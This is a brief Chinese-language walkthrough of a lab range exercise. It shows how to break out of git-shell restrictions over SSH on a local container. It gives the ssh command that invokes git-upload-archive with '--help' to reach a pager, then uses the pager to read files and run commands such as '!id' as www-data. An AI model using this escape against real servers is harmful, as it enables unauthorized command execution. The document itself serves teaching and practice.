启动靶场环境
查看文件
修改属性
为了不和docker母机的ssh端口冲突,将容器的ssh端口设置成3322。本目录下我生成了一个id_rsa,这是ssh的私钥,连接的时候请指定之。
在连接以前,需要先设置私钥的权限为0600:chmod 0600 id_rsa,否则连接可能失败。
正常连接其ssh服务ssh -p 3322 -i id_rsa git@127.0.0.1,会被git-shell给拦截,返回错误fatal: unrecognized command '',并且连接被关闭。
执行
使用--help技巧,连接目标并进入帮助页面:
ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'"
按住shift+e 输出你想查看的文件
回到帮助页面,输入!id执行命令:
(为什么是www-data用户 因为git用户和www-data用户编号都是33,所以其实他们是一个用户)